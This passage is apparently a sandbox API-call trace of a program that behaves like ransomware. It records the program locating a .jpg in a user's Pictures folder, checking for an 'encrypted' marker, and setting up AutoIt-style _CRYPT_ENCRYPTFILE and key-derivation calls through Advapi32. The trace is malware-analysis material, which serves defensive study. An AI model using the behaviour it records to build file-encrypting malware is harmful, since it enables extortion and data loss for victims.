lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.226] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.226] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.226] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.226] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.227] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.227] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x937c360, ftLastWriteTime.dwHighDateTime=0x1d5b686, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x0, dwReserved1=0x777648, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 0x7c20c0 [0041.227] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.227] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x937c360, ftLastWriteTime.dwHighDateTime=0x1d5b686, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x0, dwReserved1=0x777648, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 0x7c20c0 [0041.227] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.227] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zSK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SK4r.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.229] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.229] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.229] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.229] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.229] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x937c360, ftLastWriteTime.dwHighDateTime=0x1d5b686, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 0x7c2100 [0041.230] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.230] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.230] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.230] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.230] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.230] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.230] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.230] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.231] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.231] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0041.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.232] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.232] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.232] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.232] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.232] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.232] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.232] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.233] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.233] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.233] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.233] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.233] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.233] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", 